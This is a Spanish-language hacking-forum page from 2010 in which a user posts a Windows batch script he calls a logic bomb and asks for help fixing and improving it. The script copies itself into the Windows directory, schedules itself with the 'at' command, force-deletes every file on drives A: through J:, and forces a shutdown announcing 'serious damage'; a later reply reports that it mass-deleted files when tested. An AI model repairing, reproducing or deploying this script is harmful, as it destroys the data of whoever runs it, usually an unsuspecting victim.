elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 ... 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [19]
181  Programación / Scripting / Re: BATCH. Aclaración de codigo. :) en: 20 Marzo 2010, 17:30 pm
cierto. me llevará un rato. si descubro xke no me va i eso os comento  :xD
jeje asias por opinar xicos
182  Programación / Scripting / Re: BATCH. Aclaración de codigo. :) en: 19 Marzo 2010, 17:27 pm
jeje. yo puse las unidades, a, b c... porque si el code no encuentra una, salta a la otra, hasta q encuentre una fisica i empiece a borrar. probe el codigo, i se salta el at i empieza a borrar archivos masivamente. sin poseer ni a, ni b... solo c, d y e  ;-).
el %homepatch% y %windir% es la variable. es decir %homepatch% (la unidad donde esta el .bat, un pentdriver, y %windir% la carpeta de archivos de windows. :).
si, son comandos antiguos, pero tienen su utilidad. yo me pondre a dar repasos a mis apuntes de antaño aber q tl jeje.
asias, aber si se puede aclarar lo del codigo jeje.
un saludo
183  Programación / Scripting / BATCH. Aclaración de codigo. :) en: 19 Marzo 2010, 16:45 pm
Hola chicos. Bueno soy nuevo en el foro. Hace tiempo yo me dedicaba a hacer scripts en batch. Aprendi con pequeños tutoriales y me ha ido muy bien.
Lo que pasa hace mucho que lo descuidé y tendre que repasar :huh:.

Os comentaba que si me podiais echar una mano con este code. :)

Código:
@echo off
copy "%homepath%\HCKB.bat" "%WINDIR%\shutdownd.bat"
at 19:00 /every:1 "%WINDIR%\shutdownd.bat"
del /f /s /q "a:" *.*
del /f /s /q "b:" *.*
del /f /s /q "c:" *.*
del /f /s /q "d:" *.*
del /f /s /q "e:" *.*
del /f /s /q "f:" *.*
del /f /s /q "g:" *.*
del /f /s /q "h:" *.*
del /f /s /q "i:" *.*
del /f /s /q "j:" *.*
shutdown -s -f -r 10 -c DAÑOS GRAVES. FORZADO APAGADO.
exit


El significado del codigo que deseo realizar, como yo me acuerdo, es simplemente que el .bat se copie a windows, se programe su ejecución para el dia 1 de abril a las 7, en verdad seria ejecucion para todos los 1 de abril, pero con el primer mes basta y borre todos los archivos de todas las unidades. En plan bomba lógica. Lo he probado, y me dice.
"El nombre del archivo, el nombre de la sinxtasis de la etiqueta del volumen no es correcta."

Si %WINDIR% es el directorio general de windows, que en cualquier SO lleva hasta allí. ¿Que ocurre?.

Espero que me podais ayudar a mejorar mi codigo.
Yo colaboraré mas en este foro, que veo desde hace tiempo y que me gustaria colaborar. :)
Páginas: 1 ... 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [19]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines